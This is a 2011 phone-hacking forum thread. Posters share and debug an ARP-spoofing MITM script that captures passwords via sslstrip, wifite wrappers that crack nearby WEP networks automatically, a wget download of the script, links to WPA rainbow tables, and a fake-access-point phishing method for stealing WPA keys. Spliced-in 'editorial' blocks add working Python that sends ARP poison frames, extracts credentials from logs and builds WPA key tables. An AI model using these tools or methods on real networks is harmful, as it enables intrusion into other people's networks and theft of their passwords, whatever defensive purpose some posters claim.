[ announce ] hackattack!


vi_
2011-06-17, 16:30
Update: new version, everything fixed now :o

You have probably seen the YAMAS MITM ARP spoof script that was recently announced. While an interesting idea, it was not written with the N900 in mind. Thus, it had numerous points that needed to be addressed before it could be considered ready for the N900.


Greetz!

Thanks to comax for writing the thing.

Unhuman for hosting, alerting us to it.

Torpedo48 for testing, development.

Here I present a more N900-friendly version. This is better than the original because:

it has far fewer dependencies
it is more compatible with a stock N900
it shuts down ettercap nicely without barfing on the router's ARP table.

http://i54.tinypic.com/feqxpi.png

REQUIREMENTS:

iptables
nmap
iproute
python-twisted-web
python-openssl
python-scapy
libpcap0.8
libpcre3
sslstrip*see below
ettercap*see below

*Installation guide for ettercap, sslstrip and many other tools can be found at: http://pcsci3nce.info/?p=9

Refer to unhumans original post (http://talk.maemo.org/showthread.php?t=73988) and blog (http://pcsci3nce.info/?p=291) for more details.

Script here:

link (http://pastebin.com/raw.php?i=mBc1tKuL)


Installer!

navigate to the directory you want to put the script in then run:

wget http://pastebin.com/raw.php?i=mBc1tKuL -O ./yamas_n900.sh && chmod +x ./yamas_n900.sh

vi_
2011-06-17, 16:33
Update: If you are bothered about wifite using /tmp/ on rootfs to store temporary data, run this command AFTER you have installed everything:

[ -d /opt/tmp ] || sudo mkdir -p /opt/tmp; sudo sed -i "s/(prefix='wifite')/(prefix='wifite',dir='\/opt\/tmp')/g" /opt/wifi_mon/wifite.py

Update: Internet super hero Torpedo48 has created the installation/use guide this post was supposed to be. It doesn't get much easier than this, folks! (http://laboratorio.torpedo48.it/nokia-n900/guide/how-to-crack-a-wireless-network-s-wep-key-with-a-nokia-n900-fully-automated)

Further to the MITM script above I present another shameless hijacking of someone else's work:

They called it wifite.py...

http://i54.tinypic.com/2qv8ljm.png

I call it wepon!

This is a mildly altered copy of wifite.py with some accompanying scripts to hold the whole lot together.

Why should I care?

You should care because this is a FULLY automated WEP cracking solution. No more spazzing about with any arsecrack. Simply type wepon into the terminal (as root), then after some minutes some WEP keys will appear on the screen for all the WEP networks around you.

While it is possible to attack WPA networks with wifite I have disabled it for obvious reasons. If you are the kind of person who carries several GB of rainbow tables around on his phone then by all means re-enable it. It was disabled to speed up attack time.


Dependencies?
also install:

iw
macchanger
aircrack 1.1


Operation
The first script runs the original 'load.sh' as written by lxp. It then puts your wifi into injection mode, then runs wifite.py

wifite.py is a work of artistic scripting beauty, more details can be found here (http://code.google.com/p/wifite/).


Installation
copy this script to '/usr/bin/wepon' and chmod +x it

#!/bin/sh
#wifite starter
/opt/wifi_mon/load.sh                   # load lxp's injection-capable wl1251 driver
sleep 2
ifconfig wlan0 down                     # interface must be down to change its mode
sleep 1
iwconfig wlan0 mode monitor
sleep 1
ifconfig wlan0 up
sleep 1
python /opt/wifi_mon/wifite.py --power 12 --pps 500 --anon   # WEP only (WPA disabled in this copy), random MAC


copy this script to '/usr/bin/wepoff' and chmod +x it

#!/bin/sh
/opt/wifi_mon/unload.sh


copy this (http://ifile.it/g04phdr) archive to '/opt/wifi_mon/' and decompress it:

alternative here. (http://ifile.it/dbk6rzh)

decompress with:

tar xzvf wifi.tgz


Final note

When you are done testing pens run the 'wepoff' script. This unloads the wifi injection modules, puts wifi back into normal mode and sets the device to European channels (this simply means up to wifi channel 13 is available).

Massive thanks to lxp for creating these injection drivers. If you have not donated (http://david.gnedt.eu/blog/wl1251/) at least a measly $1 to him for his hard work writing them, you are a total gonad.

Only for learning purposes, legal blah blah blah blah

mr_pingu
2011-06-17, 16:40
Nice, I was about to write a tutorial for karam for his thread about wifite.py too, but you did it already. I have just the original script running and I have no problems at all. But your modified script made me wonder: how does it turn monitor mode on?
Why don't you use the mon0 interface spawned by airmon? Since Mentalist Traceur updated iw it doesn't conflict with aircrack anymore and thus airmon works. IMO much easier, as you can still browse the web with wlan0 ;)

LTman
2011-06-17, 16:42
The thing I like most about these apps is the legal blah blah blah,
because I bet even those who wrote the app used it for evil.

vi_
2011-06-17, 16:45
I scripted all of this a while back; my copy of iw is just stolen straight outta the Debian lenny armel deb! I found wifite to be a bit ropey with putting the device into monitor mode so decided to do it outwith. If you wanted mon0-style monitor mode you can easily just comment out the appropriate ifconfig lines in wepon/wepoff.

Straycat
2011-06-17, 16:53
Some .deb package on the near horizon??

Thanks for the work.

mr_pingu
2011-06-17, 16:57
Or just change these ifconfig lines to airmon-ng start wlan0 ;) Personally I never had problems using wifite.py to put it into monitor mode, I don't use it a lot though, but if you say it's a bit ropey this would probably be a better solution than letting wifite.py do the job.

edit: Forgot to say I like the way you disabled WPA-Attack as you won't come any further with WPA on a phone, except the handshake capture :P WEP is doing great on the N900 :D

torpedo48
2011-06-17, 17:00
I'll test it as soon as I can; BTW could you correct the typo I accidentally wrote in the checking of opt/tmp (line 16 - does not EXIST)? Thanks ;)

torpedo48
2011-06-17, 17:18
Ok, used the script once and it worked pretty badly, something got screwed up since our last version.

1 - Log is saved in root, despite the script telling the user it has been saved in opt/tmp, and vice versa (passwords are saved in opt/tmp, but the script says they are in /root); I'm fixing this in minutes;

2 - Websites are not shown in real time parsing, what happened???

3 - Ettercap is not properly closed, and after the closing of the script victims are not re-ARPed, so the user has to manually enter "q" in ettercap to reset the network.

EDIT: first point should be fixed now, check this out:
LINK REMOVED TO AVOID CONFUSION

I'm trying it right now...

q6600
2011-06-17, 17:29
hi
sorry, is it just me or is there no link for wepon and wepoff?

torpedo48
2011-06-17, 17:34
EDIT: first point should be fixed now, check this out:
http://pastebin.com/JU3g5Wm3

I'm trying it right now...

Ok, point 1 is definitely fixed, however I've discovered some other typos and malfunctions.

@vi_: maybe we should add a warning in OP telling people to not use the script for the moment, as it doesn't provide its original features.

arnoldux
2011-06-17, 17:35
now we just need a valiant person to make a UI for this to make it more n900 friendly :P


nice script btw, ftw!

Verssetti
2011-06-17, 17:36
: not found: line 4:
hackattack.sh: line 26: syntax error: unexpected word (expecting "in")

What should I do?

torpedo48
2011-06-17, 17:40
Please do not use the script, it is still in development, contains many many bugs and needs some more testing before the final release!

Verssetti
2011-06-17, 17:45
Why not use the script? I want to test this script, don't worry about the bugs.

torpedo48
2011-06-17, 17:49
Ok, sorry for the panic :D

Try this one: LINK REMOVED TO AVOID CONFUSION
Note that I didn't work on your problem, just trying to remove little bugs (e.g. the script was trying to delete grepcred.txt, which doesn't exist anymore if I correctly understood what vi_ had done).

Verssetti
2011-06-17, 17:56
same error

torpedo48
2011-06-17, 18:02
Don't know what to say, it works pretty well for me, except for the bugs I've already listed (ettercap won't re-ARP the victims; some code to trim out; real-time parser broken).

Hey vi_, where are you, we miss you! :p

king Ralphred
2011-06-17, 18:12
Just a thought. For all the people reading this forum, could you please give a detailed explanation of what this does. You could also reply "If you don't know, don't ask?" but I'll never learn.

Unhuman
2011-06-17, 18:18
Google
http://pcsci3nce.info/?p=9
http://pcsci3nce.info/?p=11

As for the script - I haven't had the time to test it yet, however can it NOT be in this green font :X It is ugly :(

vi_
2011-06-17, 19:08
oopz, seems I ****ed this one up. Gimme some moments to sort this out.

The green font is just my xterm, obviously it will be in what ever color your xterm font is set to.

However everyone knows green font on black background is the leetestist color!

vi_
2011-06-17, 19:29
Okay, I think I uploaded the wrong version. I have just tested this version and it works. It parses passwords, creates the log in /opt/tmp and behaves as normal.

Torpedo, please strip all the links in your posts to pastebin in order to avoid confusion.

If for some reason THIS version does not work, there is something extremely fvcking strange going on here.

Install script is in the first post.

Unhuman
2011-06-17, 20:21
Downloaded and tested it. Traffic redirecting is working, tail grep shows traffic to sites, however I get no login credentials in the Passwords window. Moreover, links stay https for me for some reason.

Though I installed and reinstalled like 50 packages today so it might just be my phone. Waiting for someone to confirm/deny.

vi_
2011-06-17, 21:02
Unhuman, are you using busybox-power?

can you report your busybox version?

It could be a problem with stock busybox egrep.

Unhuman
2011-06-17, 21:08
version 1.18.5

stevomanu
2011-06-17, 21:30
I have downloaded it through the wget link on the first page and I'm running into this error:


sudo: /usr/sbin/ettercap: command not found


this script worked fine (http://talk.maemo.org/showthread.php?t=73988)

Solved: I just edited the script and took out the 's' before /bin, and it's now done its job.

Will test a bit more but all seems good now, many thanks for your work to all involved.


edit


One thing I did notice was it doesn't tell you which web site they are from.

stevomanu
2011-06-17, 21:59
Ooooo, I forgot: the ettercap screen isn't terminating either.

vi_
2011-06-17, 22:14
That is because you HAVE to shut down ettercap manually. i.e. you MUST press q in order for it to re-ARP its victims. If you don't, the network will be foobar till the next ARP refresh (could be up to 15 minutes). The original version of this script used arpspoof from dsniff, unhuman changed it to use ettercap, I changed it to NOT blindly kill ettercap. If you can figure out how to send a 'q' keystroke to the ettercap console, let me know.
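
Added example (editorial; not code from the hackattack script, YAMAS, arpspoof or ettercap): the two ARP replies an ARP-spoofing MITM keeps re-sending, and the two "re-ARP" replies that undo it, which is the step the post above says must not be skipped. If the spoofer is simply killed, victim and gateway keep the attacker's MAC cached for each other until their ARP entries age out. The parse/detect side shows what an ARP-watching tool on the network would see. All MAC and IP addresses are constructed sample values; Python 3.

```python
"""ARP poison and re-ARP frames built by hand (no scapy), plus a minimal spoof check."""
import socket
import struct

ETH_P_ARP = 0x0806
ARP_OP_REPLY = 2


def mac_to_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def bytes_to_mac(b):
    return ":".join("%02x" % x for x in b)


def arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet frame + ARP reply saying 'sender_ip is at sender_mac', unicast to target."""
    eth = struct.pack("!6s6sH", mac_to_bytes(target_mac), mac_to_bytes(sender_mac), ETH_P_ARP)
    arp = struct.pack(
        "!HHBBH6s4s6s4s",
        1, 0x0800, 6, 4,          # hardware type Ethernet, protocol IPv4, address lengths
        ARP_OP_REPLY,
        mac_to_bytes(sender_mac), socket.inet_aton(sender_ip),
        mac_to_bytes(target_mac), socket.inet_aton(target_ip),
    )
    return eth + arp             # 14 + 28 = 42 bytes


def parse_arp(frame):
    """Decode the ARP fields of a frame (built here or captured off the wire)."""
    op, smac, sip, tmac, tip = struct.unpack("!H6s4s6s4s", frame[20:42])
    return {"op": op,
            "sender_mac": bytes_to_mac(smac), "sender_ip": socket.inet_ntoa(sip),
            "target_mac": bytes_to_mac(tmac), "target_ip": socket.inet_ntoa(tip)}


def poison_frames(attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip):
    """What the MITM repeats every second or so: each side learns the attacker's MAC for the other."""
    return [
        arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip),   # to victim: gateway is at attacker
        arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip),  # to gateway: victim is at attacker
    ]


def restore_frames(victim_mac, victim_ip, gateway_mac, gateway_ip):
    """The re-ARP sent on shutdown: the same two replies, now carrying the real MACs."""
    return [
        arp_reply(gateway_mac, gateway_ip, victim_mac, victim_ip),
        arp_reply(victim_mac, victim_ip, gateway_mac, gateway_ip),
    ]


def is_spoofed(frame, known):
    """Detection side: an ARP reply whose sender MAC contradicts a known ip -> mac mapping."""
    a = parse_arp(frame)
    return a["op"] == ARP_OP_REPLY and known.get(a["sender_ip"], a["sender_mac"]) != a["sender_mac"]


def send_frames(iface, frames, times=1):
    """Linux-only raw send (needs root). arpspoof/ettercap loop this until told to quit."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP)) as s:
        s.bind((iface, 0))
        for _ in range(times):
            for f in frames:
                s.send(f)


if __name__ == "__main__":
    # constructed sample addresses
    ATTACKER, VICTIM, GATEWAY = "02:00:00:00:00:aa", "02:00:00:00:00:bb", "02:00:00:00:00:01"
    known = {"192.168.1.1": GATEWAY, "192.168.1.20": VICTIM}
    for f in poison_frames(ATTACKER, VICTIM, "192.168.1.20", GATEWAY, "192.168.1.1"):
        print("poison ", parse_arp(f), "spoofed:", is_spoofed(f, known))
    for f in restore_frames(VICTIM, "192.168.1.20", GATEWAY, "192.168.1.1"):
        print("restore", parse_arp(f), "spoofed:", is_spoofed(f, known))
```

The restore pair is exactly what pressing q in ettercap makes it send; a wrapper that kills the process instead of asking it to quit never sends them, which is the 15-minute outage vi_ describes. Sending the restore frames a few times is cheap insurance against one being lost on a busy wifi.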

vi_
2011-06-17, 22:18
That means they are using a token to identify the website field in the site you were on that is not defined in the script. The script catches most of them, except some are a bit freaky and do things their own way. This is why you have the option to save the complete log, for further analysis.

I wonder why your version of ettercap is installed to a different directory?

Which version did you install? (link pls)
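
Added example (editorial; not the hackattack script's own grep): the token-matching vi_ describes, done over an sslstrip-style log. Form-field names are matched against a list of user/password tokens, and a POST whose fields match no token is kept raw instead of dropped, which is the "save the complete log" case above. The log text is a constructed sample in sslstrip's format (timestamp, "POST Data (host):" header, urlencoded body on the next line); the token lists are assumptions, not the script's. Python 3.

```python
"""Credential extraction from an sslstrip-style log by field-name tokens."""
import re
from urllib.parse import parse_qs

# assumed token lists; a real script grows these as odd forms turn up
USER_TOKENS = ("username", "user", "login", "email", "uname", "usr")
PASS_TOKENS = ("password", "passwd", "pass", "pwd")

# matches e.g. "2011-06-17 21:30:01,234 SECURE POST Data (www.example.com):"
POST_HEADER = re.compile(r"^\S+ \S+ (?:SECURE )?POST Data \((?P<host>[^)]+)\):\s*$")

# constructed sample log, three POSTs: a normal login, an unusual field naming, no credentials
SAMPLE_LOG = """\
2011-06-17 21:30:01,234 SECURE POST Data (www.example.com):
username=alice&password=s3cret&submit=Login
2011-06-17 21:31:12,005 POST Data (intranet.example.org):
j_username=bob&j_password=hunter2&lt=abc
2011-06-17 21:32:40,777 POST Data (forum.example.net):
q=search+term&page=2
"""


def pick_field(fields, tokens):
    """Value of the first form field whose (lowercased) name contains one of the tokens."""
    for name, values in fields.items():
        lname = name.lower()
        if any(tok in lname for tok in tokens):
            return values[0]
    return None


def parse_sslstrip_log(text):
    """Return one dict per POST: host/user/password when tokens match, else host/raw."""
    hits = []
    lines = text.splitlines()
    for i, line in enumerate(lines[:-1]):      # a header needs a body line after it
        m = POST_HEADER.match(line)
        if not m:
            continue
        host, body = m.group("host"), lines[i + 1]
        fields = parse_qs(body, keep_blank_values=True)
        user = pick_field(fields, USER_TOKENS)
        password = pick_field(fields, PASS_TOKENS)
        if user is not None and password is not None:
            hits.append({"host": host, "user": user, "password": password})
        else:
            hits.append({"host": host, "raw": body})   # unknown form: keep it for later analysis
    return hits


if __name__ == "__main__":
    for hit in parse_sslstrip_log(SAMPLE_LOG):
        print(hit)
```

Substring matching (j_username contains "username") is what keeps the second site from being lost the way stevomanu saw; the price is the occasional false hit, which is why the raw body is kept alongside rather than thrown away.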

stevomanu
2011-06-17, 23:04
I installed ettercap from this post here (http://talk.maemo.org/showthread.php?t=73572),

and it is ettercap NG-0.7.3.

cheers

Mentalist Traceur
2011-06-17, 23:23
Dependencies?
also install:

iw
macchanger
aircrack 1.1

i.e. apt-get install iw macchanger aircrack1.1
apt-get install aircrack-ng.

There's no "aircrack1.1" package in the repo. "aircrack-ng" in the repos however is on version 1.1.

You (vi_) already prob'ly know this, and I'm guessing that's a typo, so I'm saying this for the sake of others, mainly.

kingoddball
2011-06-18, 00:51
Good advice, but if people can't figure that out, they really should not be playing with a terminal, especially as root :rolleyes:

Sorry, I had to say it! :cool:

kingoddball
2011-06-18, 02:20
Can someone give a "how and why" this is different/better than aircrack/f-aircrack for accessing WEP?
I have set this all up and made it as easy as I can, and I will add some desktop icons and put up an install script for all later too :D

Mentalist Traceur
2011-06-18, 04:17
Normally I'd agree, but because in my ownership of the N900 I went from barely computer-savvy Linux newb to a semi-capable N900 user, and it's not really the same thing: it's one thing to say that if you don't know how to change your own password or use the shell you shouldn't use hacking tools, since that kind of stuff is readily available. But in the case of the repository, you have to know in advance that the N900's aircrack-ng package is named in accordance with the standard naming conventions for the package (if there even is such a thing, of which I'm not sure).

And while for something like the shell you can just google "Linux command line tutorial" or something and get a lot of very informative results immediately, the N900's extras repository package listings are less intuitive to search for. It took me months before Nicolai (I have this feeling I'm spelling his name wrong) kindly pointed me to the maemo.org/packages/, where you can actually search packages by name and the like, to see what packages are available and more importantly, to get the name by which they would be labeled in the repository.

No need to conflate trivial knowledge about the workings of a specific site's interface with one's ability to use the shell and be generally tech savvy.

torpedo48
2011-06-18, 07:07
Wifite is a real we(a)pon!

http://www.youtube.com/watch?v=D3-Pobgi8JM

That thing cracked my WEP key in less than 3 minutes, and far more efficiently than I would do... :S

q6600
2011-06-18, 08:25
Hi,
I made a boo-boo.
I deleted wifite.py and wifite.py.1 from /home/user and now the MITM is not working. What do I have to install?
Best regards

LTman
2011-06-18, 08:50
You guys are evil.
Buy your own bloody bandwidth and stop stealing your neighbours'.
Just because he is using an ancient router or is clueless enough to use WEP, that isn't an excuse to steal bandwidth.
P.S. It is even more evil to use it to download warez and get him busted.

stevomanu
2011-06-18, 09:08
There's always a killjoy in the house... I'm sure people aren't using these tools for bad things, are they?

Well, the programs wouldn't get made if that was the case. Chill out or jump on the train and join us lol.

torpedo48
2011-06-18, 09:25
Have you read the name of the network I maliciously attack in my two videos?

http://www.youtube.com/watch?v=WEVZ463xilU

http://www.youtube.com/watch?v=D3-Pobgi8JM

Eh eh, I'm doing bad things once I steal their password... Oh, wait... LOOK! Their network's name is torpedo48! Like mine!! Could this mean that... Well... It's my OWN bloody wifi network and I can attack and crack it every time I feel like it.

So... Why am I sharing the knowledge, if I want to be evil? Maybe we do this for testing purposes and security reasons, did you think about that? If people know, people protect themselves.

Since I started using Aircrack on the N900, I've improved my personal network security a lot, and helped improve my father's company's wifi network too. And I publish my videos on YouTube and Facebook, so that all my friends (and many other people) stop using WEP keys and insecure connections.

There will always be real evil people stealing information from unsecured wifi networks, but I think that sharing the knowledge reduces the risk, not the contrary.

anapospastos
2011-06-18, 10:26
ifile is down. Can you upload somewhere else the tar file from post 2?

torpedo48
2011-06-18, 10:39
http://laboratorio.torpedo48.it/downloads/wifi.tgz

torpedo48
2011-06-18, 10:54
Just published a simple guide for the very beginners: following it anyone will be able to properly set wifite (with the wepon/wepoff method brought to us by vi_, many thanks to him) and to crack a WEP key in minutes:

http://laboratorio.torpedo48.it/nokia-n900/guide/how-to-crack-a-wireless-network-s-wep-key-with-a-nokia-n900-fully-automated

@vi_: I'll be honoured if you insert a link to this guide in your article, so that everyone can follow the guide and install your awesome work ;)

Unhuman
2011-06-18, 11:13
Seriously, the last 10 posts have nothing to do with this topic?..

EDIT:
Lawl, didn't notice post 2... But seriously the 2 scripts have nothing in common and it makes the thread discussion ******ed.

torpedo48
2011-06-18, 11:24
Why do you say that? We are discussing about the scripts provided in the original posts, so I think they're pretty on-topic:confused:

vi_
2011-06-18, 11:44
In response to some PMs I am getting.

1. If you are having difficulty installing this, persevere. It is how ALL of us learned to do this stuff in the first place. My first Linux computer was an HP Jornada 680; it didn't even have a GUI when I started. It took me over a week (see over 20 hours) of hitting my head off a concrete penguin just to connect the thing to my university's wifi. It was back when WPA supplicant had EVEN LESS DOCUMENTATION. Point is, just persevere, you will be a better person after it!

2. Rainbow tables for WPA. MUTS from backtrack had a hand in generating these rainbow tables (http://www.offensive-security.com/wpa-tables/). These beasts are around 2GB in size each and only the top 200 ssids are covered. I estimate an n900 might be able to crunch through these 49 MILLION(!) password dictionaries in around an hour.

Be warned, some of these tables are broken, for example the belkin54g table (I think) has a capital letter at the start (DOH!) rendering it completely worthless (unless someone changed their SSID to it)

zozeta2
2011-06-18, 12:38
My Metasploit works fine but it tells me an error when I start it,
the ruby1.8-openssl?????

Mentalist Traceur
2011-06-18, 12:45
Omg WPA rainbow tables! I've been meaning to get off my *** and find some, but now I don't have to work for it. Thank you!

vi_
2011-06-18, 12:55
Well then, just for you Mentalist, here (http://forums.hak5.org/index.php?showtopic=12708) are the previous incarnation of said tables. These are 1 million word dictionary tables for the top 1000 SSIDs. These are a little more portable at only 40MB each.

Hey... WPA brute-forcing on the N900 may not be such a crazy idea after all!

I think this (http://ul.to/wsbytb/thomsonRainbowTable.zip) is a Thomson SpeedTouch/BT Home Hub rainbow table too.

mr_pingu
2011-06-18, 13:11
SpeedTouch keys, even WPA, can be derived from the SSID: stkeys on the N900 and SpeedTouched for Windows?

How can these tables be specific to a manufacturer? If we change the password then they fail also, or am I wrong?

vi_
2011-06-18, 13:27
SpeedTouch keys, even WPA, can be derived from the SSID: stkeys on the N900 and SpeedTouched for Windows?


Stkeys USED to work before they changed the algorithm. Now the hex characters at the end of the SpeedTouch SSID cannot be used to derive the key. However, the key IS still produced from the device's serial number (or something like that). This reduces the potential keyspace significantly. i.e. the length of the key is known, the character set is known and the format of the serial number is known.

How can these tables be specific to a manufacturer? If we change the password then they fail also, or am I wrong?

I am not sure I understand what you mean. The rainbow table is for a network with that specific SSID. In 'short layman's not really true terms':

WPA key=SHA1SUM(SSID+PASSWORD)

Thus we need a specific table for any given SSID (unlike LANMAN Windows tables). It has nothing to do with manufacturer, it just so happens that Belkin, Netgear etc. use their own name as the default SSID and as such that SSID will become one of the most common. In addition to this, humans are predictable in their choice of SSID. How many 'skynet's and 'myhome' wifi networks have you seen?

see (http://www.golubev.com/blog/?tag=sha1)

and

I love this one, it is like reading a geek thriller. (http://hakim.ws/st585/KevinDevine/)
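
Added example (editorial; not part of vi_'s scripts or of the linked tables): the actual WPA/WPA2 passphrase-to-PSK derivation, which is what the tables above precompute. It is PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations and a 32-byte output (IEEE 802.11i), rather than the SHA1SUM(SSID+PASSWORD) shorthand in the post; the consequence is the same, a table is bound to one exact SSID, case included, which is why the capitalised belkin54g table vi_ mentions is worthless against the lowercase network. The word list is a constructed sample; the "password"/"IEEE" vector is the standard's own test vector. Python 3.

```python
"""WPA PSK derivation and per-SSID lookup tables."""
import hashlib
import time

ITERATIONS = 4096   # fixed by the standard; this is what makes tables worth precomputing


def wpa_psk(passphrase, ssid):
    """PMK/PSK (32 bytes) that the captured 4-way handshake is ultimately checked against."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), ITERATIONS, 32)


def build_table(ssid, words):
    """Precompute psk -> passphrase for ONE SSID; this is the expensive part a table ships."""
    return {wpa_psk(w, ssid): w for w in words}


def crack(table, psk):
    """With a table in hand, testing a candidate PMK is a dictionary lookup, not 4096 HMACs."""
    return table.get(psk)


def psk_rate(seconds=0.5):
    """Derivations per second on this CPU; divide a dictionary size by this for a time estimate."""
    n, start = 0, time.perf_counter()
    while time.perf_counter() - start < seconds:
        wpa_psk("benchmark", "linksys")
        n += 1
    return n / (time.perf_counter() - start)


if __name__ == "__main__":
    words = ["password", "letmein", "qwerty123", "belkin", "admin1234"]   # constructed sample list
    table = build_table("belkin54g", words)
    captured = wpa_psk("letmein", "belkin54g")          # stands in for a PMK recovered from a handshake
    print("belkin54g  ->", crack(table, captured))       # letmein
    print("Belkin54g  ->", crack(table, wpa_psk("letmein", "Belkin54g")))   # None: case differs
    print("linksys    ->", crack(table, wpa_psk("letmein", "linksys")))     # None: other SSID
    print("%.0f PSK/s on this machine" % psk_rate())
```

psk_rate() is the number to plug into the "49 million in around an hour" estimate above: a 1-million-word table for one SSID costs 1,000,000 / psk_rate() seconds to build, and the same time to search without one.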

karam
2011-06-18, 13:29
Oh i actually just noticed this thread is here

just a bottom line

N900 can hack WEP easily
N900 can hack WPA hardly, using rainbow tables
N900 can't hack WPA with a normal handshake (it will take forever)


BUT N900 can hack WPA easily with Easy Debian after installing dhcp3,
apache2, apache2-mod-php5 and the aircrack-ng suite, also iptables and iproute

then simply create a fake AP with the dhcp3 server and apache2, in addition to a phisher web page, which has the same BSSID and ESSID as the target (but not the same channel)
then I DoS the original AP so the target will automatically connect to my fake AP (Windows problem)


in my case I use a fake web page
telling the owner that a new firmware has been installed on his router (I know the type of his router with Kismet) to create the perfect phisher

and a reconfiguration of the WEP/WPA key is required
so when he enters the key
I get it directly on my N900

That is my way to hack WPA with the N900

PS: just linked this thread in my thread
soon with these beautiful threads we will have a super N900

Mentalist Traceur
2011-06-18, 14:08
Lol at the social engineering approach. That's always fun.

In the meantime, I think if you have access to some 3G internet and have a server running at home you can SSH into, you should be more than able to launch more hardcore attacks against WPA networks that don't fall prey to your basic on-board rainbow tables.

One thing of possible concern: http://forum.aircrack-ng.org/index.php?topic=5965.0

Looks like the tables provided by Offensive Security have a bunch of invalid passwords. Well, that post is from 2009 so that may have changed by now, but figured I'd mention it and if anyone knows better, they can speak up.

stevomanu
2011-06-18, 14:15
You care to share your Metasploit with us then??

karam
2011-06-18, 14:28
There is an exploit (not public) with the WPA/WPA2 system,
I forgot what it is called, which allows one to easily hack WPA just like WEP.
PS: IT IS NOT TKIPTUN-NG (another one)
but it is the reason that they will launch another security system,
maybe 2013.

AgogData
2011-06-18, 15:06
Here is my output :

BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.

~ $ root


BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.

Nokia-N900:~# wepon
[!] unable to import pexpect
[!] if your chipset is intel4965; the fake-auth workaround will fail
[!] unable to import tkinter -- GUI disabled

  .;'                     `;,
 .;'  ,;'             `;,  `;,   WiFite r78
.;'  ,;'  ,;'     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::  mass WEP/WPA cracker
':.  ':.  ':. /_\ ,:'  ,:'  ,:'
 ':.  ':.    /___\    ,:'  ,:'   designed for backtrack4
  ':.       /_____\      ,:'
           /       \

[+] WARNING: recommended packages/apps were not found pyrit, cowpatty
[+] targeting networks with signal power greater than 12dB
[+] set WEP replay pps: 500/sec
[+] anonymous mac address enabled

[+] searching for devices in monitor mode...
[+] using interface "wlan0"

[+] waiting 30 seconds for targets to appear. press Ctrl+C to skip the wait
[+] waiting 29 seconds for targets to appear. press Ctrl+C to skip the wait
...
[+] waiting 1 seconds for targets to appear. press Ctrl+C to skip the wait

[0:00:31] 2 targets and 1 clients found

[+] added to attack list: "home3" (99dB)
[+] 1 access points targeted for attack

[+] estimated maximum wait time is 40 minutes
[+] changing mac address to 00:19:5D:4D:25:C3... changed!

[+] attacking "home3"...
[0:09:58] changing mac to 18:86:ac:e1:5a:96...
[0:09:58] changed mac; continuing attack
[0:09:59] started arp replay attack on "home3"; Ctrl+C for options
[0:09:59] arp replay attack on "home3" captured 0 ivs (0/sec) Nokia-N900:/root#
[0:09:59] stopping attack on "home3"...

[+] please select a menu option below:
[c]ontinue attacking; 3 methods left
[e]xit the program completely
[+] enter option (c, or e): Traceback (most recent call last):
File "/opt/wifi_mon/wifite.py", line 3542, in <module>
main() # launch the main method
File "/opt/wifi_mon/wifite.py", line 920, in main
attack(x - 1) # subtract one because arrays start at 0
File "/opt/wifi_mon/wifite.py", line 2009, in attack
attack_wep_all(index)
File "/opt/wifi_mon/wifite.py", line 2472, in attack_wep_all
typed=raw_input()
EOFError


There are many networks in range including my ad-hoc network (home3); the script attacks it first and when I press Ctrl+C to change it I get what's written above,
and I have to close xterm and open it again to be able to type 'wepoff'.
N.B.: That's of course for scientifical and geological purposes only

torpedo48
2011-06-18, 16:16
Here is my output :

BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.

~ $ root


BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.

Nokia-N900:~# wepon
[!] unable to import pexpect
[!] if your chipset is intel4965; the fake-auth workaround will fail
[!] unable to import tkinter -- GUI disabled

.;' `;,
.;' ,;' `;, `;, WiFite r78
.;' ,;' ,;' `;, `;, `;,
:: :: : ( ) : :: :: mass WEP/WPA cracker
':. ':. ':. /_\ ,:' ,:' ,:'
':. ':. /___\ ,:' ,:' designed for backtrack4
':. /_____\ ,:'
/ \

[+] WARNING: recommended packages/apps were not found pyrit, cowpatty
[+] targeting networks with signal power greater than 12dB
[+] set WEP replay pps: 500/sec
[+] anonymous mac address enabled

[+] searching for devices in monitor mode...
[+] using interface "wlan0"

[+] waiting 30 seconds for targets to appear. press Ctrl+C to skip the wait
[... countdown line rewritten in place once per second ...]
[+] waiting 1 seconds for targets to appear. press Ctrl+C to skip the wait

[0:00:31] 2 targets and 1 clients found

[+] added to attack list: "home3" (99dB)
[+] 1 access points targeted for attack

[+] estimated maximum wait time is 40 minutes
[+] changing mac address to 00:19:5D:4D:25:C3... changed!

[+] attacking "home3"...
[0:09:58] changing mac to 18:86:ac:e1:5a:96...
[0:09:58] changed mac; continuing attack
[0:09:59] started arp replay attack on "home3"; Ctrl+C for options
[0:09:59] arp replay attack on "home3" captured 0 ivs (0/sec) Nokia-N900:/root#
[0:09:59] stopping attack on "home3"...

[+] please select a menu option below:
[c]ontinue attacking; 3 methods left
[e]xit the program completely
[+] enter option (c, or e): Traceback (most recent call last):
File "/opt/wifi_mon/wifite.py", line 3542, in <module>
main() # launch the main method
File "/opt/wifi_mon/wifite.py", line 920, in main
attack(x - 1) # subtract one because arrays start at 0
File "/opt/wifi_mon/wifite.py", line 2009, in attack
attack_wep_all(index)
File "/opt/wifi_mon/wifite.py", line 2472, in attack_wep_all
typed=raw_input()
EOFError


There are many networks in range, including my ad-hoc network (home3); the script attacks it first and when I press Ctrl+C to change it I get what's written above.
and I have to close xterm and open it again to be able to type 'wepoff'
N.B: That's of course for scientific and geological purposes only

It seems that the only errors you get are the pexpect one and the python-tk one, although they are not needed for the attack... Try an apt-get install pexpect, but I don't think it will do much. Is your python up-to-date?

Sorry but I can't really think about any cause for your problem, if you have carefully followed the guide and you're using the modified kernel-power or kernel-power v47 wifite should work properly, you are the first encountering problems. :confused:

AgogData
2011-06-18, 16:40
